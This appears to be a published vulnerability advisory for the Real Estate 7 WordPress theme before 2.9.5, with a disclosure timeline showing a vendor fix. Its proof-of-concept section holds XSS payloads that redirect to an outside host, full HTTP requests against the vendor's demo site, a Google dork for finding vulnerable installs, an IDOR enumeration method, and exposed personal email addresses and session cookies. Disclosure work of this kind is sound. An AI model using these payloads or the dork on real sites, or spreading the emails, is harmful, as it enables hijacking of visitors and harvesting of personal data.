Real Estate 7 < 2.9.5 – Multiple Vulnerabilities

Description

Multiple vulnerabilities was discovered in the 'Real Estate 7 WordPress', tested version — v2.9.4:

- Unauthenticated Reflected XSS
- Authenticated Persistent XSS
- Authenticated Persistent Self-XSS
- IDOR
- Information Exposure

Edit (WPScanTeam):
January 12th - Report Received & Envato Contacted
January 13th - Envato Investigating
January 13th - v2.9.5 released, fixing the issues

Proof of Concept

----[]- Info: -[]----
Demo website: https://contempothemes.com/wp-real-estate-7/elementor-demo/
Google Dork: /wp-content/themes/realestate-7/
Demo account #0: m0zePoC/asdasd (login/password)
Demo account #1: agent/agent (login/password)
PoC Profile #0: https://contempothemes.com/wp-real-estate-7/minimal-demo/agent/m0ze-m0ze/
PoC Profile #1: https://contempothemes.com/wp-real-estate-7/minimal-demo/agent/agent-demo/


----[]- Reflected XSS: -[]----
Payload Sample: "><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>

PoC: https://contempothemes.com/wp-real-estate-7/elementor-demo/?ct_keyword&ct_city=%22%3E%3Cimg%20src=x%20onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;%3E&ct_state&ct_zipcode&search-listings=true&ct_property_type&ct_ct_status&ct_beds_plus&ct_baths_plus&ct_community&ct_country&ct_mls&ct_rental_guests&ct_price_from&ct_price_to&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&lat&lng


----[]- Persistent XSS -> Agent Profile: -[]----
Vulnerable textarea: «Agent Testimonials» (checkbox on «Show on Agents Page» is required).

Payload Sample: <img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>

PoC:

POST /wp-real-estate-7/minimal-demo/account-settings/ HTTP/1.1
Host: contempothemes.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------17074317185520
Content-Length: 3843
Origin: https://contempothemes.com
Connection: close
Referer: https://contempothemes.com/wp-real-estate-7/minimal-demo/account-settings/
Cookie: wordpress_logged_in_63bc6e7201d48db2e4918f48b5171dea=agent%7C1579044656%7CbronP9c4LQmxfjR6G7rde3wkkIjs5f4KLP4uS2GE6d7%7C093dd537ad0162137d9dd0c1d3ab7c3d16fc2e0179b10eef5f47d740417dc11a; wp-settings-2=editor%3Dhtml; wp-settings-time-2=1578871869; PHPSESSID=56b216626e434857c0241dc48f07871a5a391362; __stripe_mid=9dec3f56-2a9f-484e-9e46-57c24b4ac4b8; __stripe_sid=c972e371-07ad-479a-bb0d-1e937e4f6077; dsidx-visitor-results-views=2
Upgrade-Insecure-Requests: 1

-----------------------------17074317185520
Content-Disposition: form-data; name="first_name"

Agent
-----------------------------17074317185520
Content-Disposition: form-data; name="last_name"

Demo
-----------------------------17074317185520
Content-Disposition: form-data; name="nickname"

agent
-----------------------------17074317185520
Content-Disposition: form-data; name="display_name"

Agent Demo
-----------------------------17074317185520
Content-Disposition: form-data; name="user_url"


-----------------------------17074317185520
Content-Disposition: form-data; name="description"


-----------------------------17074317185520
Content-Disposition: form-data; name="twitterhandle"

#
-----------------------------17074317185520
Content-Disposition: form-data; name="facebookurl"

#
-----------------------------17074317185520
Content-Disposition: form-data; name="instagramurl"

#
-----------------------------17074317185520
Content-Disposition: form-data; name="linkedinurl"

#
-----------------------------17074317185520
Content-Disposition: form-data; name="youtubeurl"

#
-----------------------------17074317185520
Content-Disposition: form-data; name="isagent"

yes
-----------------------------17074317185520
Content-Disposition: form-data; name="agentorder"


-----------------------------17074317185520
Content-Disposition: form-data; name="MAX_FILE_SIZE"

1024000
-----------------------------17074317185520
Content-Disposition: form-data; name="ct_profile_img"; filename=""
Content-Type: application/octet-stream


-----------------------------17074317185520
Content-Disposition: form-data; name="mobile"

6195556589
-----------------------------17074317185520
Content-Disposition: form-data; name="fax"

6195556588
-----------------------------17074317185520
Content-Disposition: form-data; name="title"

Agent
-----------------------------17074317185520
Content-Disposition: form-data; name="tagline"

Selling the Dream!
-----------------------------17074317185520
Content-Disposition: form-data; name="agentlicense"

123456
-----------------------------17074317185520
Content-Disposition: form-data; name="userTestimonial"

<img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
-----------------------------17074317185520
Content-Disposition: form-data; name="MAX_FILE_SIZE"

1024000
-----------------------------17074317185520
Content-Disposition: form-data; name="ct_broker_logo"; filename=""
Content-Type: application/octet-stream


-----------------------------17074317185520
Content-Disposition: form-data; name="brokeragename"


-----------------------------17074317185520
Content-Disposition: form-data; name="brokeragelicense"


-----------------------------17074317185520
Content-Disposition: form-data; name="office"

6195553698
-----------------------------17074317185520
Content-Disposition: form-data; name="address"

101 Front St, Suite 100
-----------------------------17074317185520
Content-Disposition: form-data; name="city"

San Diego
-----------------------------17074317185520
Content-Disposition: form-data; name="state"

CA
-----------------------------17074317185520
Content-Disposition: form-data; name="postalcode"

92101
-----------------------------17074317185520
Content-Disposition: form-data; name="updateuser"

Update Profile
-----------------------------17074317185520
Content-Disposition: form-data; name="_wpnonce"

b2e5069987
-----------------------------17074317185520
Content-Disposition: form-data; name="_wp_http_referer"

/wp-real-estate-7/minimal-demo/account-settings/
-----------------------------17074317185520
Content-Disposition: form-data; name="action"

update-user
-----------------------------17074317185520--


----[]- Persistent Self-XSS -> Listing Email Alerts: -[]----
It's self-XSS, but still.

Payload Sample: "><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>

PoC:

POST /wp-real-estate-7/minimal-demo/wp-admin/admin-ajax.php HTTP/1.1
Host: contempothemes.com
User-Agent: Mozilla/5.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 294
Origin: https://contempothemes.com
Connection: close
Referer: https://contempothemes.com/wp-real-estate-7/minimal-demo/listing-email-alerts/
Cookie: wordpress_sec_63bc6e7201d48db2e4918f48b5171dea=agent%7C1579047619%7C8wlsFqjeItUZEZltmKiVodHvIFmXrAlHzBjBQA1hzPO%7Cd622e8a525d082f2219e03f48ec47622cc28f13b6c1bfffef939cbd75ab70756; wp-settings-2=editor%3Dhtml; wp-settings-time-2=1578871869; wordpress_logged_in_63bc6e7201d48db2e4918f48b5171dea=agent%7C1579047619%7C8wlsFqjeItUZEZltmKiVodHvIFmXrAlHzBjBQA1hzPO%7C8b9c07e16d6b093445f725ebb148990345f4ec8e712d60aa196cd134d92278dc; __stripe_mid=9dec3f56-2a9f-484e-9e46-57c24b4ac4b8; dsidx-visitor-results-views=11; PHPSESSID=23386885e76cc0b2eb15a06611a29dda06f8aaee; hwp_visit=1578874746788; hwp_new=true; __stripe_sid=bbfc5ced-5324-4818-b479-8c20006f2a9a

ct_property_type=0&ct_ct_status=0&beds=&baths=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%60m0ze%60)%3Bwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E&pricefrom=&priceto=&ct_city=&ct_state=&zip=&ctea_alert_creation_nounce=3eebf51cdf&action=ct_alert_creation_save&ctea_email=agent%40somedomain.com


----[]- IDOR: -[]----
Parsing this URL https://contempothemes.com/wp-real-estate-7/minimal-demo/?post_type=listings&p=XXXX with 1-4 digits for the «p» parameter can lead you to some interesting results like this: https://contempothemes.com/wp-real-estate-7/minimal-demo/package_order/ and https://contempothemes.com/wp-real-estate-7/minimal-demo/package_order/order-starter-2019-12-30-182042/ (with package name, order date and unique login/author name as a useful information).


----[]- Information Exposure: -[]----
Each agent profile page contains the «Email» link as a pop-up form trigger. This form contains hidden input field with agent/user unique email address, for example:
<input type="hidden" id="ctyouremail" name="ctyouremail" value="chris@contempographicdesign.com" />
<input type="hidden" id="ctyouremail" name="ctyouremail" value="adams@adamsgroup.website" />
<input type="hidden" id="ctyouremail" name="ctyouremail" value="alpiskris@hotmail.com" />
<input type="hidden" id="ctyouremail" name="ctyouremail" value="skyking1978@gmail.com" />

Same result you can achieve by watching the source code of agent profile page (it's faster if you'll search in code for «@» symbol from the bottom).